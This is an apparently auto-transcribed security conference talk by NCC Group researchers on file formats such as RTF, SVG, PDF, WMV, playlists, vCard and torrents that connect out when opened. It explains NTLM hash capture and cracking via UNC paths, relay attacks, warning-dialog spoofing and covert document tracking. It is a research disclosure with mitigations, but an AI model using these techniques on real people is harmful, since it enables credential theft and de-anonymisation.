 Right next to me are Daniel Crowley and Damon Smith They are both security engineers for the NCC group and they told me they could not bring a unicorn today Very sorry. Yeah they're gonna Tell us about some special properties in regular files, so Exciting, I think do your best. Thank you. I Think you're wrong. Hello. Hey, great microphone volume. Love it So as previously stated and we're here to tell you about bugged files, so Let's start out with a quick introduction. Hi. My name is Damon Smith as mentioned I am a security engineer working with NCC group Traditionally my focus has been application security including web applications embedded devices Mobile applications more recently. I've started doing some Research on file formats with this lovely gentleman right here So I mostly work. I'm also a security engineer within NCC group and I'm mostly like working with web applications crypto some embedded stuff and File formats, so let's let's move on so just to Clarify a little bit this this talk is is focused in a particular way and We're gonna be talking about files that trigger outbound traffic when they're opened We didn't want to look at executable formats because it's not really interesting for me to tell you that an executable can make Outbound traffic when you open it because there's a lot of other nasty things that can do of course We didn't really try to limit it to complex formats or simple formats or anything like that We were taking a look at what we believe are very common formats So We also didn't want to use any exploits. We didn't want to find bugs in file parsers. We wanted to Use only the features of the parsers and the formats that they're parsing And we also want to discuss the implications of all this So why should you listen to us talk at you for the next 50 minutes? We think that the research that we've done is very important for a variety of different reasons the first and most obvious reason are the privacy implications Imagine we're going to go over some of these use cases in a little bit more detail But for now imagine documents that can phone home every time you interact with them This can be used in DRM data loss prevention and of course de anonymizing users in addition to the privacy aspect There is also some serious security concerns with these types of file formats which we'll go into a little bit later Finally and I think most importantly all of the things that we're going to show you today are not bugs They're not a mistake that a programmer made. They're not off by one errors They're not memory corruption. These are things that were written into the RFC They are in the file format specification and they are working as intended This is not something that's going to be fixed on patch Tuesday. These bugs are going to live for years so We're gonna start with a quick demonstration with three different formats RTF SVG and WMV a quick prayer to the demo gods, please So here I've got I've got metasploit open just for the SMB capture so We've got this can everyone see that okay Yes, excellent, so we've got this providing the standard challenge and dumping to a file And over here we have our victim machine With several of our bug documents and this is running Windows 8.1 fully patched. Yes So we're gonna open up this RTF file now Something interesting happens here When we open this You can see in a moment. It's going to pop up a little Dialogue that says this document contains one or more links to other files Do you want to update this document with the data from the linked files? What's really interesting about this is that it has already Sent the hashes along so worst warning message ever, right? Yeah and I think probably they're looking for they they're looking to prevent bugs with You know the document attacking some parser, but Even if we say no, it doesn't matter because the hashes have already been sent, you know cats out of the bag so just So there's nothing up my sleeve here. I'm gonna clear clear this and We'll open up this SVG file by default on Windows SVG files are parsed by Internet Explorer Yeah So there's a bunch of fun things that you can do with Internet Explorer regarding this and if we have time We'll discuss that a little bit But here you see An image format of all things can can cause this interaction to occur So our example SVG file is blank But you could easily have whatever arbitrary image that you want show up so that people don't get suspicious absolutely So what I'm gonna do now we've kind of set this up to knock it out of the park It's not always gonna be this easy But in this case since we it was not quite so easy to set up a demo for NTLM relaying Which would be mostly what I think would be useful We're gonna go ahead and just crack the hashes that we've received and Here we see That we've got a throwaway account with the password of throw away so like I said, we set this one up for ourselves, but We we now just because somebody opened up a document that is you know, not malformed It's like a well-formed example of a format that's using its features You know everything is working as normal, but this is normal. So this is by design people This is how it is supposed to work. So It's just a lot of things that when put together don't work the way we really want them to So the last thing that I want to show you here is a Windows Media video file This is a slightly modified version of a video that comes with Windows by default As it turns out you can actually cause Interactions to occur from a video This is again, this is part of the format and we will be discussing this later on But we've just had it launch a a browser window So that's lovely So that concludes the demonstration and we're gonna start talking about, you know, all the different formats that we have That we've got things on and sort of the implications and whatnot so Continuing on from the demo. I probably should have hit play from current slide and I'll play from start so So there's been some prior work in this area and Damon would do you want me to take this one? So there's been some prior work in this area This is not really a new technique. We're not pioneering this whole hey, let's send ntlm In let's send SMB and get ntlm hashes This is something that's been known for a while. There's a tool out there called Zac attack which implements many of the ones that you see here There's also a tool in Metasploit that's been around since 2008 but but this problem still exists and We kind of wanted to see like how how widespread is this? So it's already known that you can do this with the office format the office open XML Which is not confusing at all when compared to the open office XML format, which is it from a different Anyway, the Microsoft XML based document formats There are ways to do this PLS playlists Shortcut files, I can read it to you, but I think you guys can read Some other silly things in Internet Explorer HTML elements can reference SMB paths and cause this interaction to happen So for instance in in Windows media player You saw that we were able to pop open a browser window using Windows media a Windows media video file We can load that up to a URL Which then has an image on an SMB resource and triggers that same ntlm interaction The same thing can be done in HTML emails in Outlook So that's a little bit of the prior art in the area. What did our research focus on? So we focused on three families of formats document formats media formats and group where formats are meeting and scheduling formats We wanted to look at file formats that your traditional corporate employee on your traditional corporate build is likely to open For instance PDF files, that's something that your average corporate employee is used to receiving in their email on a daily basis And will blindly double-click them with how and any thought So that's the that defines which file formats we specifically looked at So one of the most obvious ones is PDF This was immediately something that we wanted to take a look at. It's a very complex format We knew there was going to be something in there somewhere and they're incredibly common PDF files So we spent a little time on this you can embed remote images in PDFs as it turns out So this will just automatically go and fetch the image when opened One of the interesting things is that So as a note these only work on Adobe Reader Most of the PDF readers out there have a very limited subset of the PDF functionality available So Firefox, Chrome Preview from macOS all of these Support a limited subset of PDF functionality and these techniques don't work on them Fortunately or unfortunately depending on who you are So the remote image functionality That basically just grabs an image from a remote endpoint and displays it within the PDF And of course you have to reach out to a third party to get that and if you're creating the PDF document You're choosing who you connect to There's also JavaScript functionality in PDFs, which is you know, what could go wrong, but There is a method that allows you to open a video player within a PDF, which is is Insane I can't imagine why you would ever want to do that I can imagine why you might want to but I might you know need substances first But regardless I just you know Maybe I'm just not thinking of PDF in the way that other people are thinking of PDF regardless You can open up a video from a third-party location And the same and there's also a method that allows you to Just pop open a URL in the browser In the default browser that is which is get URL and this you might be looking at this this warning message and wondering What's going on here, and I'll I'll leave it to Damon to explain the the nitty-gritty details behind that So as we mentioned it is possible to open SMB pass within the JavaScript parsing engine of PDF readers Unfortunately, it does issue a warning message. However when we were investigating this particular bug We found an interesting aspect to this warning message Many of you are probably already familiar with UNC pass which is something like slash slash host name slash share name slash file There is an additional form of UNC that you may not be familiar with called long form UNC that goes Slash-slash question mark slash host name slash share name slash file I don't really know why that exists, but as you can see from this warning message We actually confused the PDF reader into thinking that the question mark was the host name So we can cause you to connect to dub dub dub sketchy attacker website comm but your PDF reader will instead say this document is trying to connect to Huh, do you want to allow this? I'm not sure if that's more or less sketchy than saying dub dub dub dot attacker comm But you know it's a it's a neat nuance of this particular format So have fun with it. We thought it was funny enough to include regardless of whether it's actually useful to anybody So the next format that we have and one that you've already seen a demonstration of is the rich text format The very cool thing about the demo that you saw earlier and the proof of concept is that it works in both WordPad and Microsoft Office So it doesn't matter if your victim has the Microsoft Office suite installed or not if they double-click this RTF file You will get their NTLM credentials Additionally as you saw during the demonstration It does put up a little warning message about linked files and do you want to display them? But it only displays that warning message after it has already sent your credentials to the attacker making it possibly the most useful Sorry useless warning message ever You also saw the I think it's actually So the other thing that we've already demonstrated is SVG which stands for scalable vector graphics It is an image file format But it is for displaying vector images instead of the traditional image formats which are used for bitnet images very quickly the difference between bitmap and Vector graphics is bitmap roughly is a data structure that defines this pixel has this color and this Transparency and all that and then it describes the next pixel and the next pixel and the next pixel until it has built the Entire image with vector graphics it describes the image in terms of vector functions So it says draw this line from here to here with this color So it's two different ways of encoding an image file An SVG as we mentioned during the live demonstration by default on Windows is parsed with internet Explorer The fun thing about SVG is the way that it's structured It is a markup language very similar to HTML and it actually implements a subset of the HTML language As part of the SVG format one of the things that you're allowed to specify in an SVG file are remote XML style sheets So I can say load this cascading style sheet from this remote location And if you're using internet Explorer, which by default on Windows you are It will accept file paths. So you can say for this image file I want you to download the style sheet from this remote SMB share Which of course as you saw during the demonstration leads to disclosure of NTLM credentials Additionally, they can run JavaScript. Did you know your images could have JavaScript in them? No, because that's insane So we took a look at various playlist formats as stated earlier in the talk PLS is prior art. That was not our Discovery and but we found out that both M3U Which is closely tied to the MP3 format and ASX Which is more of a Windows media specific playlist format both of those are also susceptible to this sort of Tom foolery So basically all of these playlist formats support for you know Reasons of internet radio and that sort of thing remote paths. So obviously there's the the ability to make remote references interestingly and Now I think it's probably the right time to bring up That Windows is where UNC paths are handled in general the same API call that is used to open a file from the local file system is The API it's the same API used to open UNC paths. It just sort of at some point during the the function call Sees oh, this is actually UNC path. Let me handle this remotely. You know this like remote interaction so You don't necessarily need to Write you went like SMB UNC whatever handling into your parser You just have to like use the standard way of interacting with the file system in your parser And Windows will make make this happen for you so most of these playlist formats are just They're a simple and in the case of M3U at least As a list of items a list of paths To be played so in all of these formats instead of specifying a file path You can specify UNC path and it will do the interaction sort of interaction that you saw previously Or if you just want to see when somebody opens up your playlist you can embed a remote reference at the start So the next format that we looked at is actually a family of formats the ASF family of formats Which you are probably more familiar with as Windows Media video and Windows Media audio This one was actually really interesting to us because who thought that your audio and video files could contain remote tracking code So this was actually kind of surprising result. It comes courtesy of a friend of ours Derek Hinch black days So shout out to him for introducing us to this technique the way that this is accomplished is by embedding script metadata Into an WMV or WMA file You have the ability to embed scripts in these video and audio files such that when playback reaches a specified point for instance Five seconds in it will execute the constants of this script command This has traditionally been used to accomplish things like closed captioning So you can have it display text on the screen when you reach the 30 second mark that corresponds to whatever the people on screen Are saying at 30 seconds. That's more or less how closed captioning is implemented in this format However, when you're looking at these script commands in addition to doing something like display text on screen You also have this really cool one called URL and exit which means open this specified URL and the default browser and halt playback As you saw during the demonstration this equates to you are watching a video file that you you know, whatever video file I'm not gonna I'm not gonna speculate on what kind of video it is. That's up to you But anyway, so you get to the 30 second mark That's when the video starts to become really interesting and bam It opens up your browser window to www.nsa.gov slash you've been tracked lol all so That's that's what we're running into with these file formats Yes, your video files can contain embedded script commands and yes those script commands can de-anonymize you which is really unfortunate additionally a Technique that we've postulated but have not yet proven is abusing the built-in DRM functionality So to briefly describe how DRM works in this family of formats It's actually quite simple It encrypts the entire video file and then in the header information it specifies if you want to watch this video file You need to go to this URL and download the decryption key That's more or less at a high level how DRM is implemented in these formats. It's fairly obvious that this can be used to track people Unfortunately, this is something that we haven't yet demonstrated because the DRM is so horrible to work with that We can't even get it working legitimately much less circumvented, but look for that in the future That's probably a technique that either has been used by your adversaries or will be in the future Additionally one quick note subtitles they can include arbitrary HTML Not just bold or italics or underline like you might expect in a subtitle But they can include things like image source equals so you can actually have subtitles in a video file They reference a remote image. I don't know why that's the case, but that can also be used for tracking So the next format that we took a look at was mp3 and this one was obviously very interesting to us You know, obviously there are a number of entities that are looking to crack down on piracy So this was definitely an interesting one for us The thing is that mp3 is actually a rather Simple format in comparison to some other formats mp3 by itself doesn't actually include any metadata whatsoever And this might seem confusing to you because you know, obviously mp3 is that you might legitimately acquire Have metadata and I'm describing the artist the album and all that sort of thing and as it turns out That's actually a separate format called id3, which is just sort of de facto part of mp3 now so Since mp3 is basically just a series of fixed-length blocks that say here's how you're going to interpret this block of data as Audio neck, you know coming up and then the the block of audio data and repeat that until the end of the file Id3 was the obvious choice for going after this one of the things that we learned while doing this is that People don't always follow the RFCs when creating something that is working with whatever technology you're defining There's there so id3 is The way it's structured is as a series of frames, right? So you have sort of like here's the type of frame and here's the length and then here's the frame data, right? So there were two that were interesting to us the link frame and the a pic frame link frame basically says the frame You're looking for is in another castle So, you know go off and fetch this frame from this other file here So I was like yes, that's what I want and and then there's also the a pic frame which is attached picture So you can say this picture is not here. It's in another place go fetch it So the thing is no player that we looked at and we looked at a lot of them support either of these types of frames However When we found out that you could do the the scripting content in WMA files as it turns out you can just rename a WMA file to .mp3 and as long as it opens with Windows Media Player, it will be like oh Oh, this is this is name-drawn here. I'll open this as a WMA file. Oh, oh, you want me to open a URL? Yeah, sure so So it's kind of cheating But if it's stupid and it works it ain't stupid. So there you are You might be wondering why there's a picture of a fish on this slide There's some hilarity in the id3 RFC as it turns out as a part of the a pic frame you specify What type of picture is attached? Number 13 is a bright colored fish For whatever reason Another fun fact Primus has its own innumerable like genre number in id3. So Go Primus, I guess So we also took a look at the torrent format Again, you know, lots of entities looking to de-anonymize Pirates and torrenting for whatever reason they you know has some ties with that so This one is actually pretty easy because you can have as many trackers as you want on Listed in within a torrent and when you open up the torrent It's going to check all of those trackers until it gets you know a certain number that are actually active So it's just going to visit URL after URL after URL And so you can get it to reach out to however many different places you want And since people tend to open up torrents and then just kind of leave them going for a while The fact that it takes a long time to step through Doesn't really make that big of a difference The other thing that we saw that wasn't really implemented in any torrent client We noticed that that we tried was URL seeds So this was pitched as an alternative to the classic bit torrent protocol seed You can have HTTP seeds. You can have FTP seeds Which you know if you have nothing in the swarm if you have no active seeds This is a way that you can get the data initially, right? But we didn't find anything that supports this So we weren't able to do you know FTP or any other funky URI handler We were hoping for file because again, we could get the NTLM win, but that's not something we got However, I can do something like initiate a whole bunch of HTTP requests from wherever you're opening the file So if I want to try to exploit let's say Every C-Surf flaw in home routers for the past five ten years Using a torrent file. I can do that. So that's interesting So the next one that we got a win on is the V card format This is using for exchanging virtual business cards between users of for example Outlook which is part of the Microsoft Office suite So the V card format is used for exchanging of business cards like I mentioned It has a lot of the obvious fields such as what is the person's name? What is the person's email address? What is their phone number all that stuff that you would expect? It also has some things that you might not expect at least not at first One of the attributes that it supports that we found very useful is the free busy URL Let me briefly describe what this is used for so let's say that I've exchanged my virtual business card with Dan and Dan would like to set up a meeting with me when Dan opens up his calendar client and says I want to schedule a meeting with Damon Smith His calendaring agent will automatically go to my free busy URL and say Okay, is Damon Smith busy at three o'clock is Damon Smith busy at four o'clock, etc. That is the proper functionality of the free busy URL That's obviously that's that's able to track people over HTTP What is perhaps not so obvious and I still don't understand why it's implemented this way You can include a UNC path as a free busy URL So I'm telling Dan's calendaring agent if you want to find out when I'm free You need to connect to this remote SMB share and download it from there Which is completely insane and I can't imagine why this is allowed in the parser But it's definitely allowed and it definitely allows you to steal in TLM credentials Yeah, I mean explain it away like oh well, it's okay You have local file paths that specify when somebody else is free or busy. Yeah, it doesn't make any sense like it's kind of a but um It does take a little bit of social social engineering or pretexting to get this to work Not only do you have to get the victim to Accept the virtual card and add it to their address book You then have to convince them to attempt to schedule a meeting with you So it's perhaps not the easiest to exploit, but if you've got some skills of social engineering Which I'm sure some in the crowd do you could probably pull it off so the next one we looked at we included this for posterity and for hilarity Because ICS is kind of a fun read if you take a look at the RFC Well, I guess if you like reading RFCs So I guess a quick anecdote if you're ever writing a file parser There are actually three critical steps that you have to follow step one is to read the entire RFC for whatever file format You're designing for step two is to take the RFC and light it on fire and step three is to do whatever the hell you want And completely ignore the RFC Truth real talk so So the way in which this this manifests for ICS There's a particular line of ICS files are actually very easy to read if you just pop one open You start immediately understanding sort of how the file is structured It's one of those great file formats that you can just kind of understand intuitively by looking at it when which is great One of the one of the things is V alarm which defines the alarm That is associated with a given meeting request or calendar event So one interesting thing about this is that this is actually defined by the meeting request sender not the receiver So and you can have multiple alarms So one thing that you can do which is really hilarious is to set up a meeting with somebody in Two days and set off an alarm to pop up a pop-up box and you know play a sound every minute until then So Defending on your your calendar user agent. It might automatically accept the meeting invite as well, which is hilarious so Denial of sleep attack. Yeah So so I start reading so I'm reading this RFC. It's late. I've probably had something to drink I've almost certainly had something to drink and I'm looking at this and I'm looking through the different types of alarms. There's four. There's two, you know Perfectly reasonable ones. There's one that's like display pop up a pop-up box Alarm like make some sound whatever. I don't care audio which is like Oh, go to this URL download this sound and play that and I'm like, oh that that could be nice And then the fourth one. I'm just like, you know, it's it's like a spit take moment It's like, oh, just it's called procedure. Just run this command with these parameters What So here is the heartbreaking thing or The really relieving thing depending on who you are It doesn't work in any calendar user agent that we looked at Doesn't work in any of them. I'm just imagining somebody implementing it and like looking at the RFC that no, no That's that's the light the RFC on fire moment right there So not even the successor because this is the iCalendar format Not even the successor to iCalendar supports this It I mean it does but you have to define the meeting yourself I got a little bit excited when I created something that used a procedure alarm Because it pops up this box It's like do you want to accept this and the options instead of being like yes or no are like no and No, you know, I don't even import this at all So I'm like, yes, they'll click through No or no harder. Yeah. No. Yeah. No or more no So Unfortunately, this is not a usable technique, but it's just it's a funny thing And I can't believe that this was an idea that somebody had and like wrote it down and Shared it because I just it I just I don't even understand but There you have it so All right start talking about Potential use or misuse So we've discussed the formats that make this possible now Let's discuss a little bit about why anyone would care Why would anyone want to abuse this functionality the first and perhaps the most obvious implication that we could think of is Digital rights management one of our favorite words at Chaos Camp. Am I right? We all love DRM imagine a dystopian future DRM that Every time a particular file is open calls home to a remote server to track that that file has been opened This goes beyond traditional DRM whose sole purpose is to dissuade you from opening a file when you don't have the right to open it This goes beyond that and goes into identifying the people that are attempting to open these files This is a lot more dangerous than the DRM that we have today And this is something that can be done today in today's file parsers. This is something we haven't seen it done But it's something that I think we should all be a little bit afraid of to be fair We haven't looked very hard to see if this is being done fear uncertainty and doubt on all of you So There's also the sort of a data loss prevention angle to this and there's there's two There's sort of two sides to this one is like I don't want somebody to steal my sensitive documents So I'm going to put like salaries 2016 dot PDF up on this file share of secret documents And nobody should ever open this but if it does get open then you know alert me at this URL The other side is let's say that you're a fascist government and you want to keep people from whistleblowing and You could use these techniques in theory to prevent people from being able to do that at least easily without being identified You can imagine that you know somebody exfiltrates a document that is of value to be put in the public knowledge and The document calls home from every place it's opened from your computer your work computer your home computer a Lawyer's office a friend's home And then everybody disappears Right, that's this is I think the thing that scares me most about all of this is is is this potential misuse So another that is fairly obvious is de anonymization So if you've ever used the Tor browser bundle raise your hand just kidding. Don't do that Don't tell anyone that you bad idea don't do it Yeah, so if you've ever used the Tor browser bundle and you've ever downloaded a file via the browser It pops up this great little warning dialogue that says note If you open this file it could easily de anonymize you and tell bad people what your real IP address is don't do it This research is why that warning dialogue exists. They know that this stuff is possible and they are trying to warn you The the to be clear this this warning existed before our research But this this technique this type of this sort of I this sort of idea is why that warning exists one potential application of this For instance a government agency you may not have administrative control over that jihadist wiki and you may not be able to track Its users, but let's say you upload a PDF file called how to make a bomb in three easy steps And it has a remote image URL embedded in it so that everyone that opens that PDF file You now know who they are and that they want to make a bomb in three easy steps so we we discussed this pretty or at least we showed this and Focused on this fairly extensively just because you know if you can take over somebody's machine If you can get somebody's credentials, then there's a lot more that you can do But you know this is I think a pretty important part of this is that you you can actually affect the security of The machine you can get credentials and and pass them along or or crack them Just in case somebody there's somebody in the audience who's not quite familiar with until I'm relaying attacks I'm gonna go over it very briefly So normal ntm until I'm authentication at least version 2 You as a client say to a server. Hey, I'd like to authenticate and get access to whatever it is You've got there the server says okay. Here's this number I need you to mix this in cryptographically with your password hash and send that back the client does so Returns that value to the server which then decides based on does this match up with the information? They have Should this person be allowed access now the problem here is that while the client is authenticated the server is not so there's nothing that There's nothing in this negotiation that ties this data to a particular server Except the nonce That that random number so if as an attacker you can get a client to attempt to authenticate to you You can just pass that information along Until you get to the point where you gain access and you tell the client no sorry that didn't work Would you like to try again and then you pass it to somewhere else? So We in our demo we had a password that was easily cracked. It was like you know two seconds if that This is an alternative to that where you pass the credentials along without having to crack them So anything that they the person attempting to authenticate to you knowingly or not is trying to gain access Whatever they can gain access to with their credentials You can now gain access to because of the way that NTLM works It's worth noting that as of the most recent are actually it's been quite a while back that they've patched this It is no longer possible to really authentication back to the same machine that that initiated it Hilariously before I think Windows 2000 or maybe XP you could have someone attempt to authenticate with you Pass the exact same authentication information back to their machine and authenticate to them So that's been fixed For a long time now So we discussed briefly The the fact that you're sending with these documents when you're initiating outbound requests It's coming from a privilege network position. You're behind that you're behind whatever firewall might be in place And you can exploit all sorts of interesting things that You know, maybe assume that if you're on the local network, you're totally fine And So this this slide probably could be renamed So C surf assumes some sort of authentication authenticated session that you're writing on in some cases that that that is absolutely the case As you saw in previous demonstrations Several of these techniques these formats the parsers will actually just pop pop open the default browser And and work from there If you can do that then you can ride on authenticated sessions That might exist with the default browser But even without that you're still coming from a probably a privileged network position when somebody's opening a document So we've told you what the problem is we've told you how it can be abused Let's talk a little bit about what we thought about how to fix it Possible mitigations because there really isn't a silver bullet there isn't a perfect solution to this But we're gonna go over what we thought of and why it's not necessarily a great solution The first and perhaps most obvious is antivirus all of the techniques that we're using have Fairly standard signatures. So if I bug an rtf file, it is possible for a program to analyze that rtf file and tell that it's been bugged Unfortunately, there are so many formats that this is possible for we really only scratch the surface There is no way that av can reliably cover every format that has the ability to be bugged Additionally, some of the techniques that we've used have legitimate use cases There may be a legitimate reason to embed a remote image in a pdf Or for instance a playlist file. There are legitimate reasons for a playlist file to have remote file URLs in it Otherwise, it would be kind of a boring playlist. I guess so These both of these issues are things that prevent av from being an effective mitigation Um, let's talk about format changes. So some of these formats They're not necessarily legitimate use cases for opening these types of URLs. So we'll just change the format to prevent that Unfortunately time and time again in our industry. It's been proven that that's just not possible You have to maintain a certain level of backwards compatibility There are too many people using these formats too many people using these parsers and too many files that have been created with older versions For us to be able to change the format. There's just too much inertia behind how these things are already designed Finally, in my opinion, the best mitigation that we've come up with yet application level firewalls Um, these are things like on windows zone alarm or on osx little snitch or on linux Is it lotus flower leopard flower leopard flower? So what these do is every time an application attempts to initiate a connection This firewall will notify you and say hey your pdf reader is trying to connect to attacker.com. Do you want to allow this? This is a pretty good mitigation for the vast majority of file formats. For instance It will never be the case that I want wordpad to connect to a remote server So I can say deny deny deny if my wordpad is trying to connect to a remote server However, for playlist formats like m3u that's kind of the whole point is that they connect to remote servers So you can't reliably say application firewall fixes everything and is a pancia Yeah, the the reason that we're talking about like all these different mitigations and how they Do or don't work to various degrees is Because honestly, we don't have a good solution for this. We don't we don't have a fix We're just trying to like put more fuel on the fire um So another thing we talked to we we thought about is warnings and and this goes, you know That obviously there's some use to warnings and and some people will click through but you'll at least Put be putting more information in the hands of the user um Obviously people click through warnings a lot of the time. So this is not necessarily helpful at all Um, but it might at least get you to stop and say. Oh, well, hold on that. Maybe this is not something I want to do So you're at least putting more power to the user um You could also do something to just shut off networking capabilities for particular programs in general um, you know, for instance, uh Damon made the uh example that with wordpad you I I personally and Damon apparently personally Don't want wordpad to ever communicate with the internet except maybe like if it has to communicate to Software update dot microsoft.com, but that's done through the os. So just never just never at all um So For something like that it's easy, but it's it has the same problems as application level of firewalls The other thing is attempting to hook network calls in some programs is a lot cleaner than in others Um, certain things proxy chains will just completely break because uh, it was a chrome Chrome disables the ld preload directive. So you can't use proxy chains against chrome at least the last time I tried it Um, there's also egress filtering. This is a good. Uh, this is a good partial solution and this will at least prevent things like, um Outbound smb traffic leaving your organization or your home, you know, this is something that's a good idea in general It's doing egress filtering But again, you still need to let some things through So you might be letting you know web traffic through and that's uh the way that a lot of the the privacy violating tracking stuff Uh, we were able to do that So you think this stuff is cool and you want to play with it yourself and get your hands dirty We have exactly what you want We have created a tool that accepts as input all of the various formats that we support and will produce as output A bug version of that same file. It's still a work in progress. It's like version zero zero zero negative one alpha Um, additionally, it's not yet on github because we have been really drunk this entire week and we haven't had good internet connectivity So it will be on github within the next one to two weeks if you want to download this thing and start bugging your own files So, um at this point, um, we're going to open it up for questions Okay Time for some questions anybody Over there on the mic. I see someone Hi, great talk. Um, did you guys find any issues with default file handlers? So when When windows gives a preview or when osx gives a preview of the files Did you find that would also initiate connections? to wherever so um The question uh, that the the question is did default file handling rules, uh prove to be any Effective measure against this or did they get in our way of doing this sort of thing? Or was that was that is that am I understanding you right either or really? um When you open when you click on a file, but don't open the file in windows explorer, for example You can have it preview the file without actually Opening a full version of word dot hc or whatever So so are you asking if the the preview is also vulnerable to this sort of thing? Yeah Uh, that's not something we've tested. Uh, I can imagine for certain vectors. I could certainly postulate like SVG files It would be very likely that that would be vulnerable because you can't properly display the image without downloading the style sheets So I would say it probably varies by format and I would say we can't say authoritatively whether or not that's the case Yeah, we can we can say with some some certainty that Some of them are likely to work even with preview. So anything that you have to visually render Probably it will work Anything like so like a video file where five seconds in it, you know launches a url That's almost certainly not going to work I I can say pretty pretty certainly that that's not going to work But as previously stated we haven't tested it so we can't say for try it out on your own Once we get the tool online. I will thanks Cheers Any other questions or did we just cover it so well that nobody has any uncertainty left in their hearts? I guess so Yes, let's bring it back one slide to the github url go ahead and copy it down We super duper dark promise that it will be there in one to two weeks We have a somewhat working version on our laptops But we have not yet found the person within ncc group that knows how to put things in this url But we will find that person in one to two weeks and then it will be there All right, thank you damon daniel. Thank you. Thank you all for listening